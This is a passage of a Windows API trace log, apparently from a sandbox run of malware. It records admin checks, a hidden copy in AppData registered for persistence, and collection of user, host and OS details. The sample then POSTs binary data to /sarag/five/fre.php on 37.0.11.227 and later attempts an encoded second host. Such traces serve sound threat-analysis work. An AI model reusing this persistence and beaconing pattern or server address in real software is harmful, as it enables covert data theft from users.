[1]=0x0))) returned 1 [0150.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.906] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6aebe0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fd08 | out: IsMember=0x19fd08) returned 1 [0150.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.908] GetProcessHeap () returned 0x690000 [0150.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6abc50 [0150.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.909] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fc94*=0x0) returned 1 [0150.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.989] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fc94*=0x6abcb8) returned 1 [0150.999] GetProcessHeap () returned 0x690000 [0151.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0151.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.001] CryptImportKey (in: hProv=0x6abcb8, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fc98 | out: phKey=0x19fc98*=0x69d5e8) returned 1 [0151.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.001] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fc90*=0x1, dwFlags=0x0) returned 1 [0151.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.002] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0151.002] GetProcessHeap () returned 0x690000 [0151.003] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0151.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.004] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6abc50, pdwDataLen=0x19fce8 | out: pbData=0x6abc50, pdwDataLen=0x19fce8) returned 1 [0151.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.005] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0151.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.005] CryptReleaseContext (hProv=0x6abcb8, dwFlags=0x0) returned 1 [0151.006] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6abc50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0151.006] GetProcessHeap () returned 0x690000 [0151.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x36) returned 0x69d5e8 [0151.007] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6abc50, cbMultiByte=-1, lpWideCharStr=0x69d5e8, cchWideChar=27 | out: lpWideCharStr="�����������Ќ����Й���Й��я��") returned 27 [0151.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0151.008] SHRegSetPathW (hKey=0x80000002, pcszSubKey="�����������Ќ����Й���Й��я��", pcszValue="9EDDE9", pcszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFlags=0x0) returned 0x57 [0151.009] GetProcessHeap () returned 0x690000 [0151.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69d5e8 | out: hHeap=0x690000) returned 1 [0151.010] GetProcessHeap () returned 0x690000 [0151.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abc50 | out: hHeap=0x690000) returned 1 [0151.010] GetProcessHeap () returned 0x690000 [0151.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7ef0 | out: hHeap=0x690000) returned 1 [0151.011] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFileAttributes=0x2006) returned 1 [0151.016] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9", dwFileAttributes=0x2006) returned 1 [0151.016] GetProcessHeap () returned 0x690000 [0151.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6acb98 | out: hHeap=0x690000) returned 1 [0151.017] GetProcessHeap () returned 0x690000 [0151.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7970 | out: hHeap=0x690000) returned 1 [0151.018] GetProcessHeap () returned 0x690000 [0151.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aba40 | out: hHeap=0x690000) returned 1 [0151.018] GetProcessHeap () returned 0x690000 [0151.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x2bc) returned 0x6aba40 [0151.018] GetProcessHeap () returned 0x690000 [0151.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x6aeb98 [0151.018] GetProcessHeap () returned 0x690000 [0151.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x11c) returned 0x6abd08 [0151.019] RtlGetVersion (in: lpVersionInformation=0x6abd08 | out: lpVersionInformation=0x6abd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0151.019] GetProcessHeap () returned 0x690000 [0151.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0151.020] GetProcessHeap () returned 0x690000 [0151.020] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6abd08 [0151.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.021] GetUserNameW (in: lpBuffer=0x6abd08, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0151.021] GetProcessHeap () returned 0x690000 [0151.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0151.022] GetProcessHeap () returned 0x690000 [0151.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6abd08 [0151.022] GetComputerNameW (in: lpBuffer=0x6abd08, nSize=0x19fed0 | out: lpBuffer="XC64ZB", nSize=0x19fed0) returned 1 [0151.022] GetProcessHeap () returned 0x690000 [0151.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0151.023] GetCurrentThread () returned 0xfffffffe [0151.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x0) returned 0 [0151.024] GetLastError () returned 0x3f0 [0151.025] GetCurrentProcess () returned 0xffffffff [0151.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x258) returned 1 [0151.026] GetProcessHeap () returned 0x690000 [0151.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6abd08 [0151.026] GetProcessHeap () returned 0x690000 [0151.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6abf18 [0151.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.027] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fecc | out: TokenInformation=0x0, ReturnLength=0x19fecc) returned 0 [0151.027] GetProcessHeap () returned 0x690000 [0151.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0151.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.028] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x6a8a00, TokenInformationLength=0x24, ReturnLength=0x19fecc | out: TokenInformation=0x6a8a00, ReturnLength=0x19fecc) returned 1 [0151.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.029] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6a8a08*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x6abd08, cchName=0x19febc, ReferencedDomainName=0x6abf18, cchReferencedDomainName=0x19fec0, peUse=0x19feb8 | out: Name="RDhJ0CNFevzX", cchName=0x19febc, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fec0, peUse=0x19feb8) returned 1 [0151.030] GetProcessHeap () returned 0x690000 [0151.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f44) returned 0x6b27b0 [0151.030] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0151.031] wvsprintfW (in: param_1=0x6b27b0, param_2="%s", arglist=0x19fea8 | out: param_1="XC64ZB") returned 6 [0151.031] GetProcessHeap () returned 0x690000 [0151.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0151.031] GetProcessHeap () returned 0x690000 [0151.031] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0151.031] GetProcessHeap () returned 0x690000 [0151.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0151.032] CloseHandle (hObject=0x258) returned 1 [0151.032] GetProcessHeap () returned 0x690000 [0151.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abf18 | out: hHeap=0x690000) returned 1 [0151.032] GetProcessHeap () returned 0x690000 [0151.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0151.033] GetProcessHeap () returned 0x690000 [0151.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0151.033] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0151.034] GetDesktopWindow () returned 0x10010 [0151.034] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0151.035] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fec8 | out: lpRect=0x19fec8) returned 1 [0151.035] GetProcessHeap () returned 0x690000 [0151.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8) returned 0x6ab3b0 [0151.035] GetProcessHeap () returned 0x690000 [0151.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0151.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.037] GetUserNameW (in: lpBuffer=0x19fcc8, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0151.038] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76540000 [0151.039] GetProcAddress (hModule=0x76540000, lpProcName="NetUserGetInfo") returned 0x6c7e33a0 [0151.039] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fed4 | out: bufptr=0x6a42f8*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xbbe6c, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0151.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.045] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fec0, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fec8 | out: pSid=0x19fec8*=0x6aeb68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0151.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.046] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6aeb68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fecc | out: IsMember=0x19fecc) returned 1 [0151.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.047] GetNativeSystemInfo (in: lpSystemInfo=0x19fea4 | out: lpSystemInfo=0x19fea4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0151.048] GetProcessHeap () returned 0x690000 [0151.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0151.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.048] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0151.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0151.059] GetProcessHeap () returned 0x690000 [0151.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0151.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.060] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0151.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.061] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0151.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.062] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0151.062] GetProcessHeap () returned 0x690000 [0151.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0151.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.065] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0151.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.066] CryptDestroyKey (hKey=0x69d028) returned 1 [0151.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0151.067] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0151.067] GetProcessHeap () returned 0x690000 [0151.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0151.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0151.069] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0151.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0151.070] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0151.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0151.071] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0151.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0151.073] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0151.073] GetProcessHeap () returned 0x690000 [0151.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0151.073] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0151.073] GetProcessHeap () returned 0x690000 [0151.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0151.073] socket (af=2, type=1, protocol=6) returned 0x25c [0151.073] connect (s=0x25c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0151.123] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0151.123] GetProcessHeap () returned 0x690000 [0151.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6ac020 [0151.123] GetProcessHeap () returned 0x690000 [0151.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0151.124] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0151.125] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0151.125] GetProcessHeap () returned 0x690000 [0151.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac0a8 [0151.125] GetProcessHeap () returned 0x690000 [0151.125] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0151.126] GetProcessHeap () returned 0x690000 [0151.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0151.126] GetProcessHeap () returned 0x690000 [0151.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0151.127] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0151.128] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0151.128] GetProcessHeap () returned 0x690000 [0151.128] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac168 [0151.128] GetProcessHeap () returned 0x690000 [0151.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0151.128] send (s=0x25c, buf=0x6ac168*, len=242, flags=0) returned 242 [0151.129] send (s=0x25c, buf=0x6aba40*, len=159, flags=0) returned 159 [0151.129] GetProcessHeap () returned 0x690000 [0151.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0151.129] recv (in: s=0x25c, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0151.213] GetProcessHeap () returned 0x690000 [0151.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac168 | out: hHeap=0x690000) returned 1 [0151.214] GetProcessHeap () returned 0x690000 [0151.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0151.214] GetProcessHeap () returned 0x690000 [0151.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac0a8 | out: hHeap=0x690000) returned 1 [0151.214] GetProcessHeap () returned 0x690000 [0151.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac020 | out: hHeap=0x690000) returned 1 [0151.215] closesocket (s=0x25c) returned 0 [0151.215] GetProcessHeap () returned 0x690000 [0151.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0151.216] GetProcessHeap () returned 0x690000 [0151.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0151.216] GetProcessHeap () returned 0x690000 [0151.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0151.217] GetProcessHeap () returned 0x690000 [0151.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0151.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x508) returned 0x25c [0151.218] Sleep (dwMilliseconds=0xea60) [0161.336] GetProcessHeap () returned 0x690000 [0161.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0161.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.343] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.368] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0161.385] GetProcessHeap () returned 0x690000 [0161.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0161.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.387] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0161.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.388] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.389] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.389] GetProcessHeap () returned 0x690000 [0161.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0161.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.395] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0161.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.406] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0161.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.406] CryptReleaseContext (hProv=0x6abd08, dwFlags=0x0) returned 1 [0161.406] GetProcessHeap () returned 0x690000 [0161.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0161.407] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.407] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0161.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.408] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0161.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.409] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0161.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0161.410] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0161.410] GetProcessHeap () returned 0x690000 [0161.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0161.425] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0161.427] GetProcessHeap () returned 0x690000 [0161.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0161.428] GetProcessHeap () returned 0x690000 [0161.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0161.428] GetProcessHeap () returned 0x690000 [0161.428] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0161.428] GetProcessHeap () returned 0x690000 [0161.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0161.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.439] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6abd08) returned 1 [0161.448] GetProcessHeap () returned 0x690000 [0161.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0161.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.449] CryptImportKey (in: hProv=0x6abd08, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0161.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0161.450] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.451] 